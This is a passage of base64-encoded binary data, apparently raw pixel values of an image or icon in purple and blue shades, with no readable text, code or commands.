3ABqi9wAZovcAGaH3ABmh9wAZofcAGaH3ABih9wCeX+cOn2Dol6Ji7P2mZfL/qmf4/61o/P+uav7/r2r//69q//+vav//r2r//69q//+vav//r2r+/7B65v+9p3v/vq84/7eaof+vcPb/r2r//65q/v+uaf3/rWn8/6xo+/+raPr/qmf4/6lm9v+nZfT/pWPx/6Nh7/+gX+z/nV3p/5pa5/+XV+T/lFTi/5BR4P+CT+j/gkzk/4hI2/+GRtn/hEPY/4JB1/+AP9b/fz3W/q9q//+vav//r2r//69q//+vav//oWL2/2RG5/9BOOL/bUjo/6dl+/+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+tafz/pWTy/5Fa6v9sSuf/Sz3l/0I54v9dQeT/j1nx/61p/v+vav//rmr+/65p/f+tafz/rGj6/6tn+f+pZvf/qGX18qhl9UN7GPsAexj7AHsY+wB6JPsAXXr6ACGo+gAdqPoAHaj6AB2o+gAdqPkAHaj5AB2n+QAdp/kAHKf5AByn+QAcpvkAHKb5ABym+QAcpvkAHKb5ABul+AAbpfgAG6X4ABul+AAbpPgAG6T4ABqk+AAapPgAGqP4ABqj+AAao/gAGqP3ABqi9wAZovcAGaL3ABmi9wAZovcAGaH3ABmh9wAZofcAGaH3ABig9wCdXuQWnl/ny6Ni7f+oZfT/q2j6/65p/f+vav//r2r//69q//+vav//r2r//69q//+xeO3/wqqK/8a3OP+9o5b/sXTz/69q//+vav//r2r+/65q/v+uaf3/rWn8/6xo+/+rZ/r/qmf4/6lm9v+nZPT/pWPx/6Jh7/+fX+z/nFzp/5lZ5v+WV+T/k1Ti/5BQ4P+NTd7/ikrc/4dH2/+FRdn/g0LY/4FA1/+APtb+r2r//69q//+vav//r2r//6Rk+P9sS+z/RT3o/2lJ6v+kZPr/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//rGn8/51h9v96U/L/Vkbv/0lA7P9cRev/h1by/6Zl/P+vav//r2r//69q/v+uaf3/rWn8/6xo+v+qZ/j/qWb2/6dl8/+lZPGopmTyBHsY+wB7GPsAexj7AHsY+wB4MPsATY36AB6o+gAdqPoAHaj6AB2o+gAdqPkAHKf5AByn+QAcp/kAHKf5ABym+QAcpvkAHKb5ABym+QAbpvkAG6X4ABul+AAbpfgAG6X4ABuk+AAbpPgAG6T4ABqk+AAao/gAGqP4ABqj9wAao/gAGqP3ABqi9wAZovcAGaL3ABmi9wAZofcAGaH3ABmh9wAZofcAGKD3ABig9gCbXuNUn2Do+qVk8f+qZ/j/rWn8/69q/v+vav//r2r//69q//+vav//sXT0/8Opmv/Luzz/xKyK/7N67v+vav//r2r//69q//+vav//rmr+/65p/v+uaf3/rWn8/6xo+/+rZ/r/qmf4/6hm9v+mZPP/pGPx/6Jh7v+fXuv/nFzp/5lZ5v+VVuT/klPh/49P3/+MTN7/iUnc/4dG2/+FRNn/g0HY/4FA1/6vav//r2r//69q//+oZ/z/dVHy/0tC7v9mSu//omP7/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//6xp//+JXPz/Yk/5/1FI9v9dSvP/glb1/6Rl/P+uav//r2r//69q//+vav//rmr+/61p/P+saPv/qmf4/6hm9v+mZPL/o2Pu96Ni7UV7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB1QfsAQZf6AB6o+gAdqPoAIaf5ACOm+gAjpfkAI6X5AByn+QAcp/kAHKf5ABym+QAcpvkAHKb5ABym+QAbpfgAG6X4ABul+AAbpfgAG6T4ABuk+AAbpPgAGqT4ABqk+AAao/gAGqP3ABqj9wAaovcAGqL3ABmi9wAZovcAGaL3ABmi9wAZofcAGaH3ABmh9wAYofcAGKD2AJpc4BSdXuXUo2Lu/6hm9v+saPv/rmr+/69q//+vav//r2r//69q//+3h+H/y7pc/8eygP+1f+n/r2r//69q//+vav//r2r//69q//+vav//r2r+/65q/v+uaf3/rWn8/6xo+/+raPr/qmf4/6hl9v+mZPP/pGLx/6Fg7v+eXuv/m1vo/5hY5v+VVeP/kVLh/45O3/+LS97/iUjc/4ZG2/+EQ9n/gkHY/q9q//+vav//q2n//4FY+v9RSPT/ZEzz/6Bj+/+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//qWj//21V/v9fUPv/flf6/6Fk/f+uaf//r2r//69q//+vav//r2r//69q/v+uaf3/rGj7/6tn+f+pZvb/pmTy/6Ni7v+fYOnxnl/mKHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB0Q/sAYnH6AF92+gBpZPoAblf7AG5X+wBsXfoAYHT6AF91+gBfdfoAUYb6AEiP+QA9l/kAMp35ACOj+QAcpfgAG6X4ABul+AAbpPgAG6T4ABuk+AAapPgAGqT4ABqj+AAao/gAGqP4ABqj9wAaovcAGaL3ABmi9wAZovcAGaH3ABmh9wAZofcAGaH3ABih9gAYoPYAl1vdBppd4cGhYev/qGX0/6xo+v+uav7/r2r//69q//+vav//r2r//7Bu/P+6j9b/toLo/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r+/65q/v+uaf3/rWn8/6xo+/+rZ/n/qmb4/6hl9f+mY/P/o2Lw/6Bf7f+dXer/mlro/5dX5f+UVOP/kFHh/41N3/+KSt3/iEfc/4VF2/+DQtn+r2r/665q//+KXf7/WE36/2NO+P+dYvz/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//rmr+/69q//+vav//nmT//59k//+taf//r2r//69q//+vav//r2r//69q//+vav//rmr+/61p/P+saPr/qmf3/6dl9P+kY+//n2Dp/5td4vKYXN8oexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7HPsAeh77AHgv+wB1PvsAblb6AGJw+gBNivkAOZj5ACeh+AAcpPgAG6T4ABuk+AAapPgAGqP4ABqj+AAao/gAGqP3ABqi9wAaovcAGaL3ABmi9wAZovcAGaH3ABmh9wAZofcAGaH2ABig9wCVWtsGmFzfwaBg6f+nZfP/q2j6/65p/f+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r+/65q/v+uaf3/rWn8/6xo+/+rZ/n/qWb3/6dl9f+lY/L/omHv/59f7f+cXOr/mVnn/5ZW5f+TU+P/j0/h/4xM3/+KSd3/h0bc/4VE2/uvav+7rWn//4Nb//9mU/3/mmL+/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//rmr+/6to+v+rZ/n/rmn9/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+uaf3/rWj8/6tn+f+oZvb/pWTx/6Fh6/+cXuT/llrc8pNY2Cp7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHoe+wB3NfsAcFH6AGBx+gBFkPkAK5/4ABqk+AAapPgAGqP4ABqj+AAao/gAGqL4ABqi9wAZovcAGaL3ABmi9wAZovcAGaH3ABmh9wAZofcAGKH3AJRZ2QaXW93Dn2Do/6Zl8v+raPn/rmn9/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//rmn+/65p/v+vav//r2r//69q//+vav//r2r//69q//+vav//r2r+/65q/v+uaf3/rWn8/6xo+v+qZ/n/qWb2/6dk9P+kYvH/oWDv/59e7P+bW+n/mFjn/5VV5P+SUeL/jk7g/4tL3/+JSN3/hkXc769q/4yvav//q2n//6Rm//+uav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//65p/v+qZ/j/qGX1/6lm9v+saPr/rmr+/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r+/65p/f+saPv/qmf4/6dl9P+kY+//n2Do/5lc4P+SWNb9jVTPXnsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHkn+wBwT/oAXHj5AD2V+AAfovgAGqP4ABqj+AAao/cAGqL3ABmi9wAZovcAGaL3ABmh9wAZofcAGaH3ABmh9wAZofcAkVfUJZZa2+WeX+f/pmTy/6to+f+uaf3/r2r//69q//+vav//r2r//69q//+vav//r2r//61p/P+qZ/j/q2j6/65q/v+vav//r2r//69q//+vav//r2r//69q//+vav//r2r+/65q/v+uaf3/rGj7/6to+v+qZ/j/qGX2/6Zk8/+jYvH/oWDu/55d6/+aWun/l1fm/5RU5P+RUOL/jU3g/4pK3v+IR93Zr2r/W69q//yvav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+uaf3/qmb3/6hl9f+oZfX/qGX1/6pn9/+taPz/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+uav7/rWn9/6xo+v+qZ/f/p2Xz/6Ni7f+dX+b/l1rc/49W0v9+bNbFIK79EnsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GfsAdzP7AGdl+gBJjPkAJqD4ABqj+AAao/cAGaL3ABmi9wAZovcAGaH3ABmh9wAZofcAGaH3AAuK7gGFYNZ9lVra/p5g5/+mZPL/q2f5/65p/f+vav//r2r//69q//+vav//r2r//69q//+saPv/p2X0/6Zl8/+raPr/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r+/65p/f+tafz/rGj7/6tn+f+pZvf/p2X1/6Vj8v+iYfD/oF/t/51c6v+ZWej/llbm/5NS4/+PT+H/jEzg/4pJ3rKvav8rr2r/7a9q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2z7/6946f+paPP/qGX1/6hl9f+oZfX/qGX1/6pn+f+taf3/r2r//69q//+vav//r2r//69q//+vav//r2r//65q/v+tafz/rGj6/6lm9/+mZPL/omLs/5xe5P+VWtv/jlXQ/3F93f0grv1oIa78AXsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHkn+wBsWfoASYv5ACSg+AAaovcAGaL3ABmi9wAZovcAGaH3ABmh9wAZofcAC4vuMXFv3uSWWtv/n2Do/6dl8/+raPn/rmn9/69q//+vav//r2r//69q//+vav7/q2j6/6Zk8v+iYu3/p2Xz/61p/f+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//65p/f+tafz/rWn7/6xo+v+rZ/n/qmf4/6lm9v+nZfT/pWPy/6Ni8P+iYO//n17s/5xb6v+YWOf/lVXl/5JR4/+OTuH+jEvgba9q/wmvav++r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69r/v+9mMb/ybZx/7aNzf+oZfX/qGX1/6hl9f+oZfX/qWb2/6to+v+uaf7/r2r//69q//+vav//r2r//69q//+vav//rmr+/61p/P+saPr/qWb2/6Zk8v+iYuz/nF7k/5Va2v+OVdD/e23U/y6q+u0grPpYIKr4AXsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB5JvsAZ2P6AEGR+AAdofcAGaL3ABmi9wAZofcAGaH3AAyM7iseiu3MfGfa/5db3f+gYer/p2X0/6xo+v+uaf7/r2r//69q//+vav//r2r//7Bk7f+qYOP/oWDp/6Ji7f+qZ/j/rmr+/69q//+vav//r2r//69q//+vav//r2r//69q/v+saPv/qGb1/6hl9f+oZfT/p2Xz/6Zk8/+lZPL/pGPw/6Ni7v+iYe7/o2Lw/6Ni8f+hYO7/nl3s/5ta6f+XV+f/lFPk/5BQ4+2OTuEtAAAAAK9q/3Cvav/+r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2v+/7yUzP/Lu0v/xrJz/6564v+oZfX/qGX1/6hl9f+oZfX/qWb3/6xo+/+vav7/r2r//69q//+vav//r2r//69q//+uav7/rWn8/6xo+v+pZvf/pmTy/6Ji7P+dXuX/llrb/45V0f+FWMr/R5zu/x+p9u0fqvdZIKz7BHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAdzP7AF5y+QAwmvcAGaL3ABmh9wANje8tDI3uzD6E6f+LXNX/mVzg/6Ji7P+oZvX/rGj7/65q/v+vav//r2r//69q//+waPn/vVGk/71Kif+nXNj/pWTx/6xo+/+vav//r2r//69q//+vav//r2r//69q//+uav7/q2j5/6dl8/+kY/D/pGPv/6Rj7/+jY+7/o2Lu/6Ji7f+hYev/oWHs/6Rj7/+mZPP/pWPy/6Nh8P+gX+7/nVzr/5pZ6P+WVeb/k1LkvZFQ4wkAAAAAr2r/IK9q/+Ovav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//sXH5/8KnoP/Jujj/vqOZ/6ps7/+oZfX/qGX1/6hl9f+oZfX/qmf4/61p/P+vav//r2r//69q//+vav//r2r//65q/v+tafz/rGj6/6pn9/+mZfP/o2Lt/55f5v+XW93/kFbS/4ZQxf9pdM//JaXx/x+r+fEfrPySH6z8G3sY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexv7AHFM+gAOj/AJDY7vWg2O79oVjO7/bHDc/5JY1v+bXuP/pGPv/6pn9/+tafz/r2r//69q//+vav//r2r//7Rj4//DToD/vk6P/6Vf4/+pZvb/rmn+/69q//+vav//r2r//69q//+vav//rmn+/6pn+P+mZPL/pGPv/6Rj7/+kY+//pGPv/6Rj7v+jY+7/omLt/6Nj7/+mZfP/qWb3/6hl9v+mZPT/pGLy/6Jg7/+fXuz/nFvq/5hY6P2VVOZbcgDpAAAAAACvav8Cr2r/ka9q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//tHzs/8Oudv/CskP/s43A/6hm9P+oZfX/qGX1/6hl9f+pZvb/rGj7/69q//+vav//r2r//69q//+vav//rmr+/61p/f+saPv/qmf4/6dl9P+jY+//n2Do/5hc3/+NVc//gU2+/3tPuv9TkOP/Ia37/yCt/P8frPzQH6v7YB6r+xV7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wAPkfAIDpDwQQ6Q8LENj+/3DY7v/09+5P+JWdD/lVra/59f5/+mZPL/q2f5/65p/f+vav//r2r//69q//+vaf3/vl24/8ZTe/+0WLr/pGPv/6to+v+vav//r2r//69q//+vav//r2r//69r/v+1hN//tInR/7KHzv+xhc3/r4PN/62Azf+rfs3/qXzN/6d6zP+lctr/qWb2/6to+v+rZ/n/qWb3/6hl9f+mY/P/o2Lx/6Ff7v+eXez/m1rp1JhY6BlyAOkAAAAAAAAAAACvav8sr2r/569q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//tonU/72tT/+5pmL/rHnb/6hl9f+oZfX/qGX1/6pn+P+uaf7/r2r//69q//+vav//r2r//69q//+vav7/rmn9/6xo+/+rZ/n/qGb1/6Vk8P+gYen/nFjT/4pQw/+BTb3/gk6//35fyf9HnvD/IK38/x+s/P8fq/v8Hqv7zx6q+2EdqfsdHaj6A3sY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7ABeT8gAQk/EREJLxRA+R8bIPkfD0DpDw/w6P8P88huj/f17P/5BW0/+ZXOD/omHs/6hl9f+saPv/r2r+/69q//+vav//r2r//7No7v/GXJP/xFmM/6lf3P+nZfT/rmn9/69q//+vav//r2r//69q//+vav//snT2/8m2df/MvT//yrs6/8e3N//Bsjb/u601/7aoM/+xozL/rJ4x/6iQiP+ta/n/rWj8/6xo+v+qZ/j/qWb3/6dk9f+lY/L/omHw/6Be7f2dXOtpcgDpAHIA6QAAAAAAAAAAAK9q/wKvav+Pr2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vbfv/tZWu/7aoNf+xmYn/qW3r/6hl9f+rZ/n/rmr+/69q//+vav//r2r//69q//+vav//r2r//69q//+uaf7/rWn8/6xo+v+pZvf/pmTy/6hd2v+6So3/rEmZ/4tRxv+LU8z/iFHH/3xlzf9Nme3/Iaz8/x+s/P8eq/v/Hqr7/B2p++EdqPqoHaj6VByn+iMcpvkKexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAexj7AHsY+wB7GPsAEpfzBRKW8hgRlfI/EZTykhCT8dIQk/H3D5Lx/w+R8P8PkPD/RoPm/3tgzv+NVM7/lVra/51e5f+hYev/qGX0/61p/P+vav//r2r//69q//+vav7/vWbO/8phhv+9X6//pmPu/6tn+f+vav//r2r//69q//+vav//r2r//69q//+wb/v/waG1/8OooP/Cp57/wKSe/7ygnv+4nJ7/tJid/7GUnf+tkJ3/q4TA/65q/P+tafz/rGj7/6tn+v+qZ/j/qGX2/6Zk9P+kYvH/omDv059e7RhyAOkAcgDpAAAAAAAAAAAAAAAAAK9q/yevav/cr2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+wdPH/spuD/6+hN/+qiLL/rGn4/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//65q/v+uaf3/rGj7/6tn+f+pY+z/u1Sh/8NLdf+zTqD/lljW/5FX1f+MVM7/iFHH/4FZx/9aj+b/LKj5/x+r+/8eqvv/Hqn7/x2p+v8dqPr8HKf66Rym+cUbpfmZG6X5Xhqk+EIao/glGaL4FRmi9woYofcKGKD3Chif9goXnvYKF572Chad9QoWnPUKFZv1DRSa9CMUmfQ0E5n0VBOY84sSl/O2Epby3xGV8vcRlPL/EJTy/xCT8f8PkvH/Ho/v/1N94P+AWMn/i1PL/5JY1v+YXN//m13i/6Fh6v+oZvb/rmr+/69q//+vav//r2r//7Jq9v/Iaaf/y2eP/7Jl2v+rZ/n/rmr+/69q//+vav//r2r//69q//+vav//r2r//69q//+va///r2v//69r//+vav//r2r//69q//+vav//r2r//69q//+vav7/rmn+/65p/f+taPz/rGj7/6tn+f+pZvf/p2X1/6Vj8/ijYfFfcgDpAHIA6QByAOkAAAAAAAAAAAAAAAAApWPwAK9q/2+vav/7r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vfN7/q5pa/6mUfP+ucPP/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//65p/v+tafz/rGf3/7hev//GVH3/vlOT/6Jb2P+bXeP/l1vc/5JX1f+NVM7/iFHI/4RSxP9xdNT/RJ3w/yOp+v8eqvv/Han6/x2o+v8cp/r/HKb5/xum+f8bpfn+GqT4+Rqj+O8ZovjbGaL3zRih980YoPfNF5/2zRee9s0XnvbNFp31zRac9c0Vm/XSFZr07RSa9PQUmfT+E5jz/xOX8/8SlvP/Epby/xGV8v8RlPL/FZPx/z2J6f9ua9L/hFPG/4tTy/+RV9X/lVra/5VZ2f+aXeH/pGPv/61p/P+vav//r2r//69q//+vav//umvf/85uk//Ha63/r2j1/69q/v+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+uav7/rmn9/61p/P+saPv/q2j6/6pn+P+oZvb/p2T0uKVj8wxyAOkAcgDpAHIA6QAAAAAAAAAAAAAAAAAAAAAAr2r/Dq9q/7Cvav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69r/f+tfdj/rXfl/69q/v+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r+/61p/P+1ZNr/x12L/8VZi/+sXtL/omLt/6Bg6f+cXuP/l1vd/5JY1v+OVdD/ilLK/4dQxv+BWcf/bXnX/0Wc8P8mp/n/Haj5/xyn+f8cp/n/HKb5/xul+f8bpPj/GqT4/xqj+P8Zovf/GaH3/xig9/8YoPb/F5/2/xee9v8WnfX/Fpz1/xWb9f8Vm/T/FJr0/xSZ9P8TmPP/E5fz/xKX8/8SlvL/GpTx/z2K6v9pb9X/gFfH/4hRx/+MVM3/kljW/5JY2v+KU9T/lFnZ/6Bg6v+saPv/r2r//69q//+vav//r2r//7Bq/P/HcLn/z3KU/71s2P+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q/v+uaf7/rWn9/61o/P+saPv/q2f5/6lm99+oZfYycgDpAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAr2r/Jq9q/9Svav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//smjs/8dmn//KYon/uGHI/6hl8/+nZfP/pGPv/6Bh6v+cXuX/mFzf/5RZ2f+QVtP/jVTO/4lSyv+HUcb/gVnH/3Jw0f9QjuP/NZ3v/yCk9v8cpvj/G6X5/xul+f8apPj/GqP4/xmi+P8Zoff/GKH3/xig9/8Xn/b/F572/xad9v8WnfX/FZz1/xWb9f8UmvT/FJn0/xOZ9P8Yl/P/MZHu/0+F5P9xatL/gVfI/4dRx/+LU8z/j1bS/5VZ2f+TWd3/aETa/1I62P+SWeT/q2j6/69q//+vav//r2r//69q//+vav//sWv6/8dyv//Lc7D/tGv0/69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//65q/v+taf3/rmn+/69q/v+vav//r2r//69q//+vav//r2r//69q//+vav//r2r+/65q/v+uaf3/rWn8/6xo+/+raPrzqmf5WHIA6QByAOkAcgDpAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAr2r/SK9q/+mvav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//7Bq9//FbLb/zmuN/8NnuP+uaPX/q2j6/6lm9/+nZfT/pGPw/6Fh7P+eX+f/m13i/5db3f+UWdj/kFfT/41Vz/+JUsn/hE/B/4FOvv96W8P/bXHQ/1mI4P9Jk+n/OJzx/yeh9v8jovf/GaL4/xmi9/8Yoff/GKD3/xef9v8Xnvb/F572/xad9f8fm/T/JJnz/zaT7/9JjOn/WoLj/3Fu1v9/Xcz/h1PI/4pSyv+NVM7/kFbT/5RZ2P+ZXN//mVzj/3FK4P9ANt//VDzg/55h9v+vav//r2r//69q//+vav//r2r//69q//+vav//sWv7/7Nr9v+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+uaf7/q2f5/6lm9/+qZ/j/q2j6/6xo+/+tafz/rmn+/69q/v+vav//r2r//69q//+vav//r2r+/65p/f+taf3/rWj8/Kxo+5GraPoFcgDpAHIA6QByAOkAcgDpAHIA6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACuav4Ar2r/bq9q//ivav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//6xo+/+saPv/rWn9/65q/v+vav//r2r//69q//+vav//r2r//69q//+vav3/wG7Q/89xlP/Kbqn/tGrx/65p/f+tafz/rGj6/6pn+P+oZvX/pmTy/6Nj7v+gYer/nl/m/5td4v+YW97/kljW/41Vz/+KU8v/iFHI/4ZQxf+FT8P/hE/B/4JRwv9/Wcb/eWXN/3Vt0v9seNr/bHjZ/2x32f9sd9n/bHfa/2122v9tdtr/bnbb/3dt1v9+ZdP/hVzP/4pWzf+MVM7/jlXQ/49W0v+RV9X/lFnY/5Za3P+aXeH/nl/n/55g6f96T+X/Rzvk/1I+5P+XXfT/r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//rmn9/6pn9/+nZfP/pmTy/6dl8/+nZfT/qGb1/6lm9/+qZ/j/q2j6/6xo+/+tafz/r2r//69q//+vav7/rmr+/65p/f+tafyzrGj7D3IA6QByAOkAcgDpAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvav8Hr2r/f69q//ivav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//65q/v+raPr/qGb1/6hm9v+qZ/j/rGj6/61p/P+uav7/r2r//69q//+vav//r2r//7Jr+f/Jc7b/znOf/7ps5f+vav//r2r+/65q/v+taf3/rGj7/6tn+f+pZ/f/qGX0/6Zk8f+jY+7/oWLr/6Rx2P+datL/lFnY/5JY1v+RV9T/j1bR/41Vz/+LVMz/ilPK/4lSyf+JUsn/iVLJ/4pSyv+LU8z/i1PM/4xUzf+NVM7/jVXP/49V0f+QVtP/kVfV/5NY1/+UWdn/llrb/5db3f+YXN//ml3h/5xe5P+eX+f/oGHq/6Nj7v+kY/D/hFXs/05B6/9SQen/k1z1/65q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//61p/P+pZvf/pmTz/6Zk8v+mZPL/pmTy/6Zk8v+mZPL/pmTy/6dk8/+nZfT/qGb1/6tn+f+uav7/r2r//69q//+uav7/rmn9vK5p/R5kAM8AcgDpAHIA6QByAOkAcgDpAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvav8Hr2r/fa9q//ivav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+uaf7/q2f5/6hl9f+nZfT/p2X0/6dl9P+oZvX/qmf3/6to+v+tafz/rmr+/69q//+vav//r2r//7Vs8v+6bef/sGr+/69q//+vav//r2r//69q/v+uaf3/rWn8/6xo+/+rZ/n/qmf3/6hm9f+qb+v/xK+F/8Wxcf+ykq//oG3V/5lc3v+YW93/llrc/5VZ2f+TWNj/kljW/5FX1P+RV9T/k1jX/5Va2v+WWtv/llrb/5db3P+YW97/mVzg/5td4v+cXuT/nl/m/59g6P+gYer/omHs/6Ni7v+kY+//pWTx/6Zl8/+oZvX/qGb2/45b8v9WR/D/U0Xv/49b9/+uaf//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+pZ/v/lFvw/5tf8P+iYvL/pWTy/6Zk8v+mZPL/pmTy/6Zk8v+mZPL/pmTy/6Zk8/+pZvb/rWn8/69q//+vav//r2r//69q/ruuav4eAwAOAF0AwAByAOkAcgDpAHIA6QByAOkAcgDpAHIA6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvav8Gr2r/fK9q//evav//r2r//69q//+vav//r2r//69q//+vav//rmz+/6hu9/+nZfT/p2X0/6dl9P+nZfT/p2X0/6dl9P+nZfT/qGb1/6lm9/+rZ/n/rWj8/65q/v+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav7/rmn+/61p/f+saPv/q2j6/65z7//Eq5f/y7pP/8q6Pf/Brm3/sI+v/6Nu2f+dX+X/nV7l/5xe4/+bXeL/ml3i/5xe5P+fYOj/oGDp/6Bg6f+gYOn/oWHq/6Fh7P+jYu7/pGPw/6Zk8v+nZfP/qGb1/6lm9v+qZ/f/qmf4/6tn+f+raPr/rGj7/6xo+/+XYPn/Xk33/1VJ9f+LWvj/rWn//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//69q//+vav//r2r//5Rb8v9BNNz/TDrg/2FE5v93T+z/jVnw/5tg8v+iY/P/pWTy/6Zk8v+mZPP/qWb2/61p/P+vav//r2r//69q//+vav+6r2r/HQAAAAAAAAAAOgB8AG4A4gByAOkAcgDpAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvav8Gr2r/e69q//evav//r2r//69q//+vav//r2r//69q//+am/T/esTn/5Kd7f+idfL/p2b0/6dl9P+nZfT/p2X0/6dl9P+nZfT/p2X0/6hl9f+qZ/j/rmn9/69q//+vav//r2r//6